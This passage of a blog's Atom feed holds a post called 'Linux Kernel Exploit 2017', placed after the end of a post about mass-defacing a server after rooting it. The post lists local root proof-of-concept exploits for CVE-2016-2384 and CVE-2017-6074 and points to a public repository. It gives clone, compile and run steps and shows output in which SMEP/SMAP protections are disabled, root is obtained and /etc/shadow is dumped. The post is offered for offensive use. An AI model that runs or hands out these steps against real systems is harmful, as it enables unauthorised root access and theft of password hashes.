src=&quot;?feature=player_embedded&quot; width=&quot;320&quot;&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Thanks you :p&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Writed by : (&lt;b&gt;Zaenal Arifin&lt;/b&gt;)&lt;/span&gt;&lt;div class=&quot;blogger-post-footer&quot;&gt;http://feeds.feedburner.com/bandungdigitalsecurity&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='https://www.bandungdigitalsecurity.org/feeds/3316649929829226105/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.bandungdigitalsecurity.org/2018/07/mass-deface-1-server-after-rooting.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1481717144980864440/posts/default/3316649929829226105'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1481717144980864440/posts/default/3316649929829226105'/><link rel='alternate' type='text/html' href='https://www.bandungdigitalsecurity.org/2018/07/mass-deface-1-server-after-rooting.html' title='Mass Deface 1 Server Setelah Root'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://3.bp.blogspot.com/-fj56sXdP8yg/W0RErh3NOrI/AAAAAAAAAEI/PxygoZYAvuwBNAdOub67B0OalH4kuOXzQCLcBGAs/s72-c/Rooting.PNG" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1481717144980864440.post-5412869977973928177</id><published>2018-07-12T06:46:00.002-07:00</published><updated>2018-08-15T20:27:20.235-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Exploit"/><category scheme="http://www.blogger.com/atom/ns#" term="Linux"/><category scheme="http://www.blogger.com/atom/ns#" term="Rooting"/><category scheme="http://www.blogger.com/atom/ns#" term="Security"/><category scheme="http://www.blogger.com/atom/ns#" term="Server"/><category scheme="http://www.blogger.com/atom/ns#" term="Shell"/><category scheme="http://www.blogger.com/atom/ns#" term="Tutorial"/><title type='text'>Linux Kernel Exploit 2017</title><content type='html'>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://1.bp.blogspot.com/-fq9G5uZVeL8/W0SljGTDYwI/AAAAAAAAAEU/0NyZGYTNaw86FXEgaUa1ZxGnawAlkgjawCEwYBhgL/s1600/CVE-2017-6074-470x260.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;260&quot; data-original-width=&quot;470&quot; src=&quot;https://1.bp.blogspot.com/-fq9G5uZVeL8/W0SljGTDYwI/AAAAAAAAAEU/0NyZGYTNaw86FXEgaUa1ZxGnawAlkgjawCEwYBhgL/s1600/CVE-2017-6074-470x260.png&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;Whats is Linux Kernel ?&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;The  Linux kernel is an open-source monolithic Unix-like computer operating  system kernel. The Linux family of operating systems is based on this  kernel and deployed on both traditional computer systems such as  personal computers and servers, usually in the form of Linux  distributions,[9] and on various embedded devices such as routers,  wireless access points, PBXes, set-top boxes, FTA receivers, smart TVs,  PVRs, and NAS appliances. The Android operating system for tablet  computers, smartphones, and smartwatches uses services provided by the  Linux kernel to implement its functionality. While the adoption on  desktop computers is low, Linux-based operating systems dominate nearly  every other segment of computing, from mobile devices to mainframes. As  of November 2017, all of the world&#39;s 500 most powerful supercomputers  run Linux.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;Proof of Concept :&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Kernel Exploits &amp;nbsp;is A bunch of proof-of-concept exploit for the Linux kernel.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;Exploit Lists&lt;/b&gt; :&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;[+]&amp;nbsp;CVE-2016-2384&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;This  is a proof-of-concept exploit for the vulnerability in the usb-midi  Linux kernel driver (CVE-2016-2384). Requires physical access to the  machine.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;[+]&amp;nbsp;CVE-2017-6074&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;This  is a proof-of-concept local root exploit for the vulnerability in the  DCCP protocol implementation CVE-2017-6074. Includes a semireliable  SMEP/SMAP bypass (the kernel might crash shorty after the exploit  succeds).&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://2.bp.blogspot.com/-rQb62RypZkA/W0SmRdV8xnI/AAAAAAAAAEc/1Q0N4P_cF9k5eC1PJtqVxnwXxdgcQeMtgCLcBGAs/s1600/CVE-2017-6074.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;394&quot; data-original-width=&quot;932&quot; height=&quot;268&quot; src=&quot;https://2.bp.blogspot.com/-rQb62RypZkA/W0SmRdV8xnI/AAAAAAAAAEc/1Q0N4P_cF9k5eC1PJtqVxnwXxdgcQeMtgCLcBGAs/s640/CVE-2017-6074.png&quot; width=&quot;640&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;A proof-of-concept local root exploit for CVE-2017-6074.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Includes a semireliable SMAP/SMEP bypass.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Tested on 4.4.0-62-generic #83-Ubuntu kernel.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Source: https://github.com/xairy&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;and use your brain to use.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt; &lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;Usage :&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;/span&gt; &lt;br /&gt;&lt;table 100=&quot;&quot; align=&quot;left&quot; class=&quot;code-table&quot; style=&quot;background: 0px 0px rgb(255, 255, 255); border-collapse: collapse; border: 1px rgb(153, 153, 153); box-sizing: border-box; color: #333333; font-size: 13px; line-height: 21px; outline: 0px; padding: 0px; table-layout: fixed; text-align: justify; transition: all 0.3s ease; vertical-align: baseline; width: 550px;&quot;&gt;&lt;tbody style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;tr align=&quot;left&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;th style=&quot;background: linear-gradient(rgb(1, 177, 211) 0%, rgb(33, 183, 212) 40%, rgb(63, 210, 238) 100%); border: 1px solid rgb(153, 153, 153); box-sizing: border-box; outline: 0px; padding: 0px; text-align: center; text-shadow: rgba(0, 0, 0, 0.298039) 2px 4px 3px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: left; text-indent: 3px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Command :&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/th&gt;&lt;/tr&gt;&lt;tr style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;td style=&quot;background: linear-gradient(rgb(235, 236, 218) 0%, rgb(224, 224, 198) 40%, rgb(206, 206, 183) 100%); border: 1px solid rgb(153, 153, 153); box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: start; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-size: x-small; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; line-height: normal; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;b style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;background-color: initial;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: small;&quot;&gt;git clone https://github.com/xairy/kernel-exploits [CVE Number]&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: start; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: small;&quot;&gt;&lt;b&gt;&amp;nbsp;Example:&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: start; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: small;&quot;&gt;&lt;b&gt;&amp;nbsp;$ cd CVE-2017-6074&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: start; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: small;&quot;&gt;&lt;b&gt;&amp;nbsp;$ gcc poc.c -o pwnd&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: start; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: small;&quot;&gt;&lt;b&gt;&amp;nbsp;$ chmod +x pwnd&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: start; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: small;&quot;&gt;&lt;b&gt;&amp;nbsp;$ ./pwnd&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: start; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: small;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: start; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Processing&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;background-color: initial; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;...............&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: start; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: small;&quot;&gt;[.] namespace sandbox setup successfully&lt;/span&gt;&lt;/div&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: start; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: small;&quot;&gt;[.] disabling SMEP &amp;amp; SMAP&lt;/span&gt;&lt;/div&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: start; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: small;&quot;&gt;[.] scheduling 0xffffffff81064550(0x406e0)&lt;/span&gt;&lt;/div&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: start; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: small;&quot;&gt;[.] waiting for the timer to execute&lt;/span&gt;&lt;/div&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: start; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: small;&quot;&gt;[.] done&lt;/span&gt;&lt;/div&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: start; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: small;&quot;&gt;[.] SMEP &amp;amp; SMAP should be off now&lt;/span&gt;&lt;/div&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: start; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: small;&quot;&gt;[.] getting root&lt;/span&gt;&lt;/div&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: start; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: small;&quot;&gt;[.] executing 0x402043&lt;/span&gt;&lt;/div&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: start; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: small;&quot;&gt;[.] done&lt;/span&gt;&lt;/div&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: start; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: small;&quot;&gt;[.] should be root now&lt;/span&gt;&lt;/div&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: start; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: small;&quot;&gt;[.] checking if we got root&lt;/span&gt;&lt;/div&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: start; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: small;&quot;&gt;[+] got r00t ^_^&lt;/span&gt;&lt;/div&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: start; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: small;&quot;&gt;[!] don&#39;t kill the exploit binary, the kernel will crash&lt;/span&gt;&lt;/div&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: start; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: small;&quot;&gt;# cat /etc/shadow&lt;/span&gt;&lt;/div&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: start; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: small;&quot;&gt;// ...&lt;/span&gt;&lt;/div&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: start; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: small;&quot;&gt;daemon:*:17149:0:99999:7:::&lt;/span&gt;&lt;/div&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: start; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: small;&quot;&gt;bin:*:17149:0:99999:7:::&lt;/span&gt;&lt;/div&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: start; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: small;&quot;&gt;sys:*:17149:0:99999:7:::&lt;/span&gt;&lt;/div&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: start; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: small;&quot;&gt;sync:*:17149:0:99999:7:::&lt;/span&gt;&lt;/div&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: start; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;games:*:17149:0:99999:7:::&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: start; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: start; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;#EOF&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;div class=&quot;blogger-post-footer&quot;&gt;http://feeds.feedburner.com/bandungdigitalsecurity&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='https://www.bandungdigitalsecurity.org/feeds/5412869977973928177/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.bandungdigitalsecurity.org/2018/07/linux-kernel-exploit-2017-proof-of.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1481717144980864440/posts/default/5412869977973928177'/><link rel='self' type='application/atom+xml' 